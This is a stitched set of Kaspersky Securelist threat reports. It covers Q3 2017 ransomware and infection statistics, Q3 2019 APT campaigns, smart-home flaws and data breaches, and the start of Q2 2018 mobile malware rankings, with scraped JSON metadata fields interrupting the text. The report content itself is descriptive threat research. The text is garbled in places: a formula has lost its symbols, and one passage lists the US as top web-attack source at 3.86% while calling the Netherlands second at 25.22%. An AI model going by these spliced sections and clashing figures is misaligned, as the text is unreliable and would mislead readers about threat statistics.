This could be a temporary trend, or could indicate that cybercriminals are gradually losing their interest in cryptors as a means of making money, and are switching over to other types of malware.\n\n#### The number of users attacked by ransomware\n\nJuly was the month with the lowest ransomware activity. From July to September, the number of ransomware attacks rose, though it remained lower than May and June when two massive epidemics (WannaCry and ExPetr) struck.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-14-en.jpg>)\n\nNumber of unique users attacked by Trojan-Ransom cryptor malware (Q3 2017)\n\n#### The geography of attacks\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-15-en.jpg>)\n\n#### Top 10 countries attacked by cryptors\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Myanmar | 0.95% \n2 | Vietnam | 0.92% \n3 | Indonesia | 0.69% \n4 | Germany | 0.62% \n5 | China | 0.58% \n6 | Russia | 0.51% \n7 | Philippines | 0.50% \n8 | Venezuela | 0.50% \n9 | Cambodia | 0.50% \n10 | Austria | 0.49% \n \n_* We excluded those countries where the number of Kaspersky Lab product users is relatively small (under 50,000) \n** Unique users whose computers have been targeted by ransomware as a percentage of all unique users of Kaspersky Lab products in the country._\n\nMost of the countries in this Top 10 are from Asia, including Myanmar (0.95%), a newcomer to the Top 10 that swept into first place in Q3. Vietnam (0.92%) came second, moving up two places from Q2, while China (0.58%) rose one place to fifth.\n\nBrazil, Italy and Japan were the leaders in Q2, but in Q3 they failed to make it into the Top 10. 
Europe is represented by Germany (0.62%) and Austria (0.49%).\n\nRussia, in tenth the previous quarter, ended Q3 in sixth place.\n\n#### Top 10 most widespread cryptor families\n\n| **Name** | **Verdict*** | **% of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 16.78% | \n2 | Crypton | Trojan-Ransom.Win32.Cryptoff | 14.41% | \n3 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 6.90% | \n4 | Locky | Trojan-Ransom.Win32.Locky | 6.78% | \n5 | Cerber | Trojan-Ransom.Win32.Zerber | 4.30% | \n6 | Cryrar/ACCDFISA | Trojan-Ransom.Win32.Cryrar | 3.99% | \n7 | Shade | Trojan-Ransom.Win32.Shade | 2.69% | \n8 | Spora | Trojan-Ransom.Win32.Spora | 1.87% | \n9 | (generic verdict) | Trojan-Ransom.Win32.Gen | 1.77% | \n10 | (generic verdict) | Trojan-Ransom.Win32.CryFile | 1.27% | \n \n_* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data. \n** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware._\n\nWannacry (16.78%) tops the rating for Q3, and the odds are that it's set to remain there: the worm has been propagating uncontrollably, and there are still huge numbers of computers across the globe with the unpatched vulnerability that Wannacry exploits.\n\nCrypton (14.41%) came second. This cryptor emerged in spring 2016 and has undergone many modifications since. It has also been given multiple names: CryptON, JuicyLemon, PizzaCrypts, Nemesis, x3m, Cry9, Cry128, Cry36.\n\nThe cryptor Purgen (6.90%) rounds off the top three after rising from ninth. 
The rest of the rating is populated by 'old timers' \u2013 the Trojans Locky, Cerber, Cryrar, Shade, and Spora.\n\nThe Jaff cryptor appeared in the spring of 2017, going straight into fourth place in the Q2 rating, and then stopped spreading just as suddenly.\n\n### Top 10 countries where online resources are seeded with malware\n\n_The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn the third quarter of 2017, Kaspersky Lab solutions blocked **277,646,376** attacks launched from web resources located in 185 countries around the world. **72,012,219** unique URLs were recognized as malicious by web antivirus components.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-16-en.jpg>)\n\nDistribution of web attack sources by country, Q3 2017\n\nIn Q3 2017, the US (3.86%) was home to most sources of web attacks. The Netherlands (25.22%) remained in second place, while Germany moved up from fifth to third. Finland and Singapore dropped out of the top five and were replaced by Ireland (1.36%) and Ukraine (1.36%).\n\n**Countries where users faced the greatest risk of online infection**\n\nIn order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. 
The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **_Malware_** class. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of users attacked**** \n---|---|--- \n1 | Belarus | 27.35 \n2 | Algeria | 24.23 \n3 | Russia | 23.91 \n4 | Armenia | 23.74 \n5 | Moldova | 23.61 \n6 | Greece | 21.48 \n7 | Azerbaijan | 21.14 \n8 | Kyrgyzstan | 20.83 \n9 | Uzbekistan | 20.24 \n10 | Albania | 20.10 \n11 | Ukraine | 19.82 \n12 | Kazakhstan | 19.55 \n13 | France | 18.94 \n14 | Venezuela | 18.68 \n15 | Brazil | 18.01 \n16 | Portugal | 17.93 \n17 | Vietnam | 17.81 \n18 | Tajikistan | 17.63 \n19 | Georgia | 17.50 \n20 | India | 17.43 \n \n_These statistics are based on detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data._ \n_* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (under 10,000 users). 
\n** Unique users whose computers have been targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 16.61% of computers connected to the Internet globally were subjected to at least one **Malware-class** web attack during the quarter.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-17-en.jpg>)\n\nGeography of malicious web attacks in Q3 2017 (ranked by percentage of users attacked)\n\nThe countries with the safest online surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%) and Cuba (4.44%).\n\n## Local threats\n\n_Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q3 2017, Kaspersky Lab's file antivirus detected **198,228,428** unique malicious and potentially unwanted objects.\n\n**Countries where users faced the highest risk of local infection**\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating of malicious programs only includes **Malware-class** attacks. 
The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of users attacked**** \n---|---|--- \n1 | Yemen | 56.89 \n2 | Vietnam | 54.32 \n3 | Afghanistan | 53.25 \n4 | Uzbekistan | 53.02 \n5 | Laos | 52.72 \n6 | Tajikistan | 49.72 \n7 | Ethiopia | 48.90 \n8 | Syria | 47.71 \n9 | Myanmar | 46.82 \n10 | Cambodia | 46.69 \n11 | Iraq | 45.79 \n12 | Turkmenistan | 45.47 \n13 | Libya | 45.00 \n14 | Bangladesh | 44.54 \n15 | China | 44.40 \n16 | Sudan | 44.27 \n17 | Mongolia | 44.18 \n18 | Mozambique | 43.84 \n19 | Rwanda | 43.22 \n20 | Belarus | 42.53 \n \n_These statistics are based on detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users' computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives._ \n_* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (under 10,000 users). \n** The percentage of unique users in the country with computers that blocked **Malware-class** local threats as a percentage of all unique users of Kaspersky Lab products._\n\nThis Top 20 of countries has not changed much since Q2, with the exception of China (44.40%), Syria (47.71%) and Libya (45.00%) all making an appearance. 
The proportion of users attacked in Russia amounted to 29.09%.\n\nOn average, 23.39% of computers globally faced at least one **Malware-class** local threat during the third quarter.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-18-en.jpg>)\n\nGeography of local malware attacks in Q3 2017 (ranked by percentage of users attacked)\n\n**The safest countries in terms of local infection risks** included Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czechia (7.89%), Ireland (6.86%) and Japan (5.79%).\n\n_All the statistics used in this report were obtained using [Kaspersky Security Network](<https://www.kaspersky.com/images/KESB_Whitepaper_KSN_ENG_final.pdf>) (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity._", "cvss3": {}, "published": "2017-11-10T10:45:04", "type": "securelist", "title": "IT threat evolution Q3 2017. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-7269", "CVE-2017-8570", "CVE-2017-8759"], "modified": "2017-11-10T10:45:04", "href": "https://securelist.com/it-threat-evolution-q3-2017-statistics/83131/", "id": "SECURELIST:376CB760FDD4E056A8D0695A9EB9756A", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-11-29T10:36:40", "description": "\n\n## Targeted attacks and malware campaigns\n\n### Mobile espionage targeting the Middle East\n\nAt the end of June we reported the details of a highly targeted campaign that we dubbed 'Operation ViceLeaker' involving the spread of malicious Android samples via instant messaging. The campaign affected several dozen victims in Israel and Iran. 
We discovered this activity in May 2018, right after Israeli security agencies announced that Hamas had installed spyware on the smartphones of Israeli soldiers, and we released a private report on our [Threat Intelligence Portal](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>). We believe the malware has been in development since late 2016, but the main distribution began at the end of 2017. The attackers used two methods to install these implants: they backdoored legitimate apps, injecting malicious Smali code; and they built an open-source legitimate 'Conversations' messenger that included the malicious code. You can read more about Operation ViceLeaker [here](<https://securelist.com/fanning-the-flames-viceleaker-operation/90877/>).\n\n### APT33 beefs up its toolset\n\nIn July, we published an update on the 2016-17 activities of [NewsBeef](<https://securelist.com/twas-the-night-before/91599/>) (aka APT33 and Charming Kitten), a threat actor that has focused on targets in Saudi Arabia and the West. NewsBeef lacks advanced offensive capabilities and has previously engaged in long-term, elaborate social engineering schemes that take advantage of popular social network platforms. In previous campaigns, this threat actor has relied heavily on the Browser Exploitation Framework (BeEF). However, in the summer of 2016, the group deployed a new toolset that included macro-enabled Office documents, PowerSploit, and the Pupy backdoor. 
The most recent campaign uses this toolset in conjunction with [spear-phishing](<https://encyclopedia.kaspersky.com/glossary/spear-phishing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) emails, links sent over social media and standalone private messaging applications, and [watering-hole](<https://encyclopedia.kaspersky.com/glossary/watering-hole/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) attacks that use compromised high-profile websites (some belonging to the Saudi government). The group has changed multiple characteristics year over year \u2013 tactics, the malicious JavaScript injection strategically placed on compromised websites, and command-and-control (C2) infrastructure. Subscribers to our [private intelligence reports](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>) receive unique and extraordinary data on significant activity and campaigns of more than 1009 APTs from across the world, including NewsBeef.\n\n### New FinSpy iOS and Android implants found in the wild\n\nWe recently reported on the [latest versions of FinSpy for Android and iOS](<https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/>). Governments and law enforcement agencies across the world use this surveillance software to collect personal data. FinSpy implants for iOS and Android have almost identical functionality: they are able to collect personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges by abusing known vulnerabilities. 
The iOS version doesn't provide infection exploits for its customers and so can only be installed on [jailbroken](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) devices \u2013 suggesting that physical access is required in order to install the implant. During our latest research we detected up-to-date versions of these implants in almost 20 countries, but we think the actual number of infections could be much higher.\n\n### Turla revamps its toolset\n\nTurla (aka Venomous Bear, Uroboros and Waterbug), a high-profile Russian-speaking threat actor with a known interest in cyber-espionage against government and diplomatic targets, has made significant changes to its toolset. Most notably, the group has wrapped its notorious JavaScript KopiLuwak malware in a new dropper called Topinambour, a new .NET file that is being used by Turla to distribute and drop its JavaScript KopiLuwak through infected installation packages for legitimate software programs such as VPNs for circumventing internet censorship. Named by the malware authors, Topinambour is an alternative name for the Jerusalem artichoke. Some of the changes the threat actor has made are intended to help it evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. Further, the malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. The two KopiLuwak analogues \u2013 the .NET RocketMan Trojan and the PowerShell MiamiBeach Trojan \u2013 are used for cyber-espionage. We think the threat actor deploys these versions when the computers of the targets are protected with security software capable of detecting KopiLuwak. 
All three implants are able to fingerprint targets, gather information on system and network adapters, steal files, and download and execute additional malware. MiamiBeach is also able to take screenshots. You can read more [here](<https://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/>).\n\n### CloudAtlas uses new infection chain\n\n[Cloud Atlas](<https://securelist.com/recent-cloud-atlas-activity/92016/>) (aka Inception) has a long history of cyber-espionage operations targeting industries and government bodies. We first reported this group in 2014 and we have continued to track its activities. During the first half of this year, we identified campaigns focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts. Cloud Atlas hasn't changed its TTPs (Tactics, Techniques and Procedures) since 2018 and continues to rely on existing tactics and malware to compromise high value targets. The threat actor's Windows intrusion set still uses spear-phishing emails to target its victims: these are crafted with Office documents that use malicious remote templates \u2013 whitelisted per victim \u2013 hosted on remote servers. Previously, Cloud Atlas dropped its 'validator' implant, named PowerShower, directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. In recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed in 2014.\n\n### Dtrack banking malware discovered\n\nIn summer 2018, we discovered ATMDtrack, a piece of banking malware targeting banks in India. We used YARA and the Kaspersky Attribution Engine to try to uncover more information about this ATM malware; and we found more than 180 new malware samples of a spy tool that we now call Dtrack. 
All the Dtrack samples we initially found were dropped samples, as the real payload was encrypted with various droppers \u2013 we were able to find them because of the unique sequences shared by ATMDtrack and the Dtrack [memory dumps](<https://encyclopedia.kaspersky.com/glossary/dump/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). Once we decrypted the final payload and used the Kaspersky Attribution Engine again, we saw similarities with the [DarkSeoul campaign](<https://unit42.paloaltonetworks.com/tdrop2-attacks-suggest-dark-seoul-attackers-return/>), dating back to 2013 and attributed to the Lazarus group. It seems that they reused part of their old code to attack the financial sector and research centers in India. Our telemetry indicates that the latest DTrack activity was detected in the beginning of September 2019. This is a good example of how proper YARA rules and a solid working attribution engine can help to uncover connections with established malware families. In this case, we were able to add another family to the Lazarus group's arsenal: ATMDtrack and Dtrack. You can find our public report on Dtrack [here](<https://securelist.com/my-name-is-dtrack/93338/>).\n\n## Other security news\n\n### Sodin ransomware attacks MSP\n\nIn April, the Sodin ransomware (aka Sodinokibi and REvil) caught our attention, not least, because of the way it spread. The Trojan [exploited the CVE-2019-2725 vulnerability](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) to execute a PowerShell command on a vulnerable Oracle WebLogic server, allowing the attackers to upload a dropper to the server, which then installed the ransomware payload. Patches for this vulnerability were released in April, but at the end of June, a similar vulnerability was discovered \u2013 CVE-2019-2729. 
Sodin also carried out [attacks on MSPs](<https://www.darkreading.com/attacks-breaches/attackers-exploit-msps-tools-to-distribute-ransomware/d/d-id/1335025>). In some cases, the attackers used the Webroot and Kaseya remote access consoles to deliver the Trojan. In others, [the attackers penetrated MSP infrastructure using an RDP connection](<https://www.reddit.com/r/msp/comments/c2wls0/kaseya_weaponized_to_deliver_sodinokibi_ransomware/>), elevated privileges, deactivated security solutions and backups and then downloaded the ransomware to client computers. This ransomware was also unusual because it didn't require the victim to carry out any action. Our statistics indicated that most victims were located in the Asia-Pacific region, including Taiwan, Hong Kong and South Korea.\n\nRansomware continues to be a major headache for consumers and businesses alike. Recovering data that a ransomware Trojan has encrypted is often impossible. However, in some cases we are able to do so. Recent examples include the [Yatron and FortuneCrypt malware](<https://securelist.com/ransomware-two-pieces-of-good-news/93355/>). If you ever face a situation where a ransomware Trojan has encrypted your data, and you don't have a backup, it's always worth checking the [No More Ransom](<https://www.nomoreransom.org/>) site, to see if a decryptor is available. You can find our decryptors for both of the above ransomware programs [here](<https://support.kaspersky.com/viruses/disinfection/10556>) and [here](<https://www.nomoreransom.org/en/decryption-tools.html>).\n\n### The impact of web mining\n\n[Malicious miners](<https://securelist.com/kaspersky-security-bulletin-2018-story-of-the-year-miners/89096/>) are programs designed to hijack the victim's CPU in order to mine crypto-currencies. 
The business model is simple: infect the computer, use the processing power of their [CPU](<https://en.wikipedia.org/wiki/Central_processing_unit>) or [GPU](<https://en.wikipedia.org/wiki/Graphics_processing_unit>) to generate coins and earn real-world money through legal exchanges and transactions. It's not obvious to the victim that they are infected \u2013 most people seldom use most of their computer's processing power and miners harness the 70-80% that is not being used for anything else. Miners can be installed along with adware, hacked games and other pirated content. However, there's also another model \u2013 using an embedded mining script that starts when the victim opens an infected web page. Where a corporate network has been infected, the CPU capacity available to the cybercriminals can be huge. But what impact does mining have? We recently tried to quantify the economic and environmental impact of web miners; and thereby evaluate the positive benefit of protecting against mining.\n\nThe total power saving can be calculated using the formula \u00b7N, where is the average value of the increase in power consumption of the victim's device during the web mining process, and N is the number of blocked attempts according to KSN ([Kaspersky Security Network](<https://www.kaspersky.com/ksn>)) data for 2018. This figure is equal to 18.8\u00b111.8 gigawatts (GW) \u2013 twice the average power consumption rate of all Bitcoin miners in the same year. To assess the amount of saved energy based on this power consumption rate, this number is multiplied by the average time that victim devices spend on web mining; that is, according to the formula '\u00b7N\u00b7t', where 't' is the average time that web miners would have been working had they not been blocked by our products. 
Since this value cannot be obtained from Kaspersky data, we used information from open sources provided by third-party researchers, according to which the estimated amount of electricity saved by users of our products ranges from 240 to 1,670 megawatt hours (MWh). Using the average prices for individual consumers, this amount of electricity could cost up to $200,000 for residents in North America or up to \u20ac250,000 for residents in Europe.\n\nYou can read our report [here](<https://securelist.com/electricity-and-mining/93292/>).\n\n### Mac OS threat landscape\n\nSome people still believe that there are no serious threats for Mac OS. There are certainly fewer threats than for Windows, mainly because more people run Windows, so there is a bigger pool of potential victims for attackers to target. However, as the number of people running Mac OS has grown, so have the number of threats targeting them.\n\nOur database currently contains 206,759 unique malicious and potentially unwanted files for Mac OS. From 2012 to 2017, the number of people facing attack grew year by year, reaching a peak in 2017, when we blocked attacks on around 255,000 computers running Mac OS. Since then, there has been a drop; and in the first half of 2019, we blocked around 87,000 attacks. The majority of threats for Mac OS in 2019 fell into the adware category \u2013 these threats are easier to create, offering a better return on investment for cybercriminals.\n\nThe number of phishing attacks targeting Mac OS has also increased year by year. During the first half of 2019, we detected nearly 6 million phishing attacks, 11.8% of which targeted corporate users. The countries facing the most phishing attacks were Brazil (30.87%), India (22.08%) and France (22.02%). The number of phishing attacks seeking to exploit the Apple brand name has also grown in recent years \u2013 by around 30-40% each year. 
In 2018, there were nearly 1.5 million such attacks; and in the first half of 2019 alone, the number exceeded 1.6 million \u2013 already an increase of 9% over the previous year.\n\nYou can read our report on the current Mac OS threat landscape [here](<https://securelist.com/threats-to-macos-users/93116/>).\n\n### Smart home vulnerabilities\n\nOne of our colleagues chose to turn his home into a smart home and installed a Fibaro Home Center system, so that he could remotely manage smart devices in the house, including lights, heating system, fridge, stereo system, sauna heater, smoke detectors, flood sensors, IP cameras and doorbell. He invited researchers from the [Kaspersky ICS CERT](<https://ics-cert.kaspersky.com/>) team to investigate it to see how secure it was. The researchers knew the model of the smart home hub and the IP address. They decided not to look at the Z-Wave protocol, which the smart home hub uses to talk to the appliances, because this required physical proximity to the house. They also discarded the idea of exploiting the programming language interpreter \u2013 the Fibaro hub used the patched version.\n\nOur researchers were able to find a remote SQL injection vulnerability, despite the efforts of Fibaro to avoid them, and a couple of remote code execution vulnerabilities in the PHP code. If exploited, these vulnerabilities would allow attackers to get root access rights on the smart hub, giving them full control over it. They also found a severe vulnerability in the Fibaro cloud that could allow an attacker to access all backups uploaded from Fibaro hubs around the world. This is how our research team acquired the backup data stored by the Fibaro Home Center located in this particular home. 
Among other things, this backup contains a database file with a lot of personal information, including the house's location, geo-location data from the owner's smartphone, the email address used to register with Fibaro, information about smart devices in the owner's home and even the owner's password. Credit to Fibaro Group not only for creating a rather secure product but also for working closely with our researchers to quickly patch the vulnerabilities we reported to them. You can read the full story [here](<https://securelist.com/fibaro-smart-home/91416/>).\n\n### Security of smart buildings\n\nThis quarter we also looked at the [security of automation systems in buildings](<https://securelist.com/smart-buildings-threats/93322/>) \u2013 sensors and controllers to manage elevators, ventilation, heating, lighting, electricity, water supply, video surveillance, alarm systems, fire extinguishing systems and more in industrial facilities. Such systems are used not only in office and residential buildings but also in hospitals, shopping malls, prisons, industrial production, public transport and other places where large work and/or living areas need to be controlled. We looked at the live threats to building-based automation systems to see what malware their owners encountered in the first six months of 2019.\n\nMost of the blocked threats were neither targeted, nor specific to building-based automation systems, but ordinary malware regularly found on corporate networks unrelated to automation systems. Such threats can still have a significant impact on the availability and integrity of automation systems, from file encryption (including databases) to denial of service on network equipment and workstations because of malicious traffic and unstable exploits. 
Spyware and backdoors pose a far greater threat, since stolen authentication data and the remote control it provides can be used to plan and carry out a subsequent targeted attack on a building's automation system.

### Smart cars and connected devices

Kaspersky has investigated smart car security several times in recent years ([here](<https://securelist.com/mobile-apps-and-stealing-a-connected-car/77576/>) and [here](<https://securelist.com/a-study-of-car-sharing-apps/86948/>)), revealing a number of security issues. As vehicles become smarter and more connected, they are also becoming more exposed. However, this doesn't just apply to smart cars and the apps that support them. There is now a whole industry of after-market devices designed to improve the driving experience – from car scanners to tuning gadgets. In a recent report, [we reviewed a number of automotive connected devices](<https://securelist.com/on-the-iot-road/91833/>) and examined their security setup. This exercise gave us a first look at the security issues in these devices. Our review included a couple of auto scanners, a dashboard camera, a GPS tracker, a smart alarm system and a pressure and temperature monitoring system.

We found the security of these devices more or less adequate, leaving aside minor issues. This is partly due to the limited device functionality and the lack of serious consequences in the event of a successful attack. It's also due to the vigilance of vendors. However, as we move towards a more and more connected future, it's important to remember that the smarter an object is, the more attention should be paid to security in the development and updating of the device: careless development or an unpatched vulnerability could allow an attacker to hijack a victim's car or spy on an entire car fleet.

We continue to develop [KasperskyOS](<https://os.kaspersky.com/2019/05/20/kasperskyos-an-immune-based-approach-to-information-system-security/>), to help customers secure connected systems – including mobile devices and PCs, internet of things devices, intelligent energy systems, industrial systems, telecommunications systems and transportation systems.

If you're considering buying a device to make your car a little bit smarter, you should think about the security risks. Check to see if any vulnerabilities affect the device and whether it's possible to apply security updates to it. Don't automatically buy the most recently released product, since it might contain a security flaw that hasn't yet been discovered: the best choice is to buy a product that has already been updated several times. Finally, always consider the security of the 'mobile dimension' of the device, especially if you use an Android device: while applications make life easier, once a smartphone is hit by malware a lot can go wrong.

### Personal data theft

We've become used to a steady stream of reports in the news about data breaches. Recent examples include the [theft of 23,205,290 email addresses](<https://www.forbes.com/sites/daveywinder/2019/08/05/cafepress-hacked-23m-accounts-compromised-is-yours-one-of-them/#625d70cf407e>) together with passwords weakly stored as base64-encoded SHA-1 hashes from CafePress. Worryingly, the hack was reported by [Have I Been Pwned](<https://haveibeenpwned.com>) – CafePress didn't notify its customers until some months after the breach had occurred.

In August, two Israeli [researchers discovered fingerprints, facial recognition data and other personal information from the Suprema Biostar 2 biometric access control system in a publicly accessible database](<https://www.theguardian.com/technology/2019/aug/14/major-breach-found-in-biometrics-system-used-by-banks-uk-police-and-defence-firms>). The exposure of biometric data is of particular concern. If a hacker is able to obtain my password, I can change it, but a biometric is for life.

[Facebook has faced criticism on several occasions for failing to handle customers' data properly](<https://www.kaspersky.com/blog/facebook-10-fails/26980/>). In the latest of a long list of incidents, hundreds of millions of [phone numbers linked to Facebook accounts were found online](<https://techcrunch.com/2019/09/04/facebook-phone-numbers-exposed/?guccounter=1>) on a server that wasn't protected with a password. Each record contained a unique Facebook ID and the phone number listed on the account, leaving affected Facebook customers open to spam calls and SIM-swap attacks.

On September 12, mobile gaming company [Zynga reported that some player account data may have been accessed illegally by 'outside hackers'](<https://www.scmagazine.com/home/security-news/the-word-is-out-zynga-was-breached/>). Subsequently, a hacker going by the name of Gnosticplayers claimed to have breached the player database of _Words With Friends_, as well as data from _Draw Something_ and the discontinued game _OMGPOP_, exposing the data of more than 200 million Android and iOS players. While Zynga spotted the breach and notified customers, it's worrying that passwords were stored in cleartext.

Consumers have no direct control over the security of the personal data they disclose to online providers.
However, we can limit the damage of a security breach at an online provider by ensuring that the passwords we create are unique and hard to guess, or by using a password manager to do this for us. By making use of two-factor authentication, where offered by an online provider, we can further reduce the impact of any breach.

It's also worth bearing in mind that hacking the server of an online provider isn't the only way that cybercriminals can get their hands on passwords and other personal data. They also harvest data stored on a consumer's computer directly. This includes data stored in browsers, files from the hard disk, system data, account logins and more. Our data shows that 940,000 people were targeted by malware designed to steal such data in the first half of 2019. We would recommend using specialist software to store account passwords and bank card details, rather than relying on your browser. You can find out more about how cybercriminals target personal data on computers [here](<https://securelist.com/how-to-steal-a-million-of-your-data/91855/>).

**Source:** "IT threat evolution Q3 2019", Securelist, published 2019-11-29 – <https://securelist.com/it-threat-evolution-q3-2019/95268/>. CVEs referenced: CVE-2017-11882, CVE-2018-0802, CVE-2019-2725, CVE-2019-2729.

## Q2 figures

According to KSN:

 * Kaspersky Lab solutions blocked 962,947,023 attacks launched from online resources located in 187 countries across the globe.
 * 351,913,075 unique URLs were recognized as malicious by Web Anti-Virus components.
 * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 215,762 users.
 * Ransomware attacks were registered on the computers of 158,921 unique users.
 * Our File Anti-Virus logged 192,053,604 unique malicious and potentially unwanted objects.
 * Kaspersky Lab products for mobile devices detected:
   * 1,744,244 malicious installation packages
   * 61,045 installation packages for mobile banking Trojans
   * 14,119 installation packages for mobile ransomware Trojans.

## Mobile threats

### General statistics

In Q2 2018, Kaspersky Lab detected 1,744,244 malicious installation packages, which is 421,666 packages more than in the previous quarter.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175855/180803-it-threat-evolution-q2-2018-statistics-1.png>)

_Number of detected malicious installation packages, Q2 2017 – Q2 2018_

#### **Distribution of detected mobile apps by type**

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175922/180803-it-threat-evolution-q2-2018-statistics-2-0.png>)

_Distribution of newly detected mobile apps by type, Q1 2018_

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/03175916/180803-it-threat-evolution-q2-2018-statistics-2.png>)

_Distribution of newly detected mobile apps by type, Q2 2018_

Among all the threats detected in Q2 2018, the lion's share belonged to potentially unwanted RiskTool apps (55.3%); compared to the previous quarter, their share rose by 6 p.p. Members of the RiskTool.AndroidOS.SMSreg family contributed most to this indicator.

Second place was taken by Trojan-Dropper threats (13%), whose share fell by 7 p.p. Most detected files of this type came from the families Trojan-Dropper.AndroidOS.Piom and Trojan-Dropper.AndroidOS.Hqwar.

The share of advertising apps continued to decrease, by 8%, accounting for 9% (against 11%) of all detected threats.

A remarkable development during the reporting period was that SMS Trojans doubled their share, to 8.5% in Q2 from 4.5% in Q1.

#### **TOP 20 mobile malware**

_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool or Adware._

| | Verdict | %* |
|---|---|---|
| 1 | DangerousObject.Multi.Generic | 70.04 |
| 2 | Trojan.AndroidOS.Boogr.gsh | 12.17 |
| 3 | Trojan-Dropper.AndroidOS.Lezok.p | 4.41 |
| 4 | Trojan.AndroidOS.Agent.rx | 4.11 |
| 5 | Trojan.AndroidOS.Piom.toe | 3.44 |
| 6 | Trojan.AndroidOS.Triada.dl | 3.15 |
| 7 | Trojan.AndroidOS.Piom.tmi | 2.71 |
| 8 | Trojan.AndroidOS.Piom.sme | 2.69 |
| 9 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.54 |
| 10 | Trojan-Downloader.AndroidOS.Agent.ga | 2.42 |
| 11 | Trojan-Dropper.AndroidOS.Agent.ii | 2.25 |
| 12 | Trojan-Dropper.AndroidOS.Hqwar.ba | 1.80 |
| 13 | Trojan.AndroidOS.Agent.pac | 1.73 |
| 14 | Trojan.AndroidOS.Dvmap.a | 1.64 |
| 15 | Trojan-Dropper.AndroidOS.Lezok.b | 1.55 |
| 16 | Trojan-Dropper.AndroidOS.Tiny.d | 1.37 |
| 17 | Trojan.AndroidOS.Agent.rt | 1.29 |
| 18 | Trojan.AndroidOS.Hiddapp.bn | 1.26 |
| 19 | Trojan.AndroidOS.Piom.rfw | 1.20 |
| 20 | Trojan-Dropper.AndroidOS.Lezok.t | 1.19 |

_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._

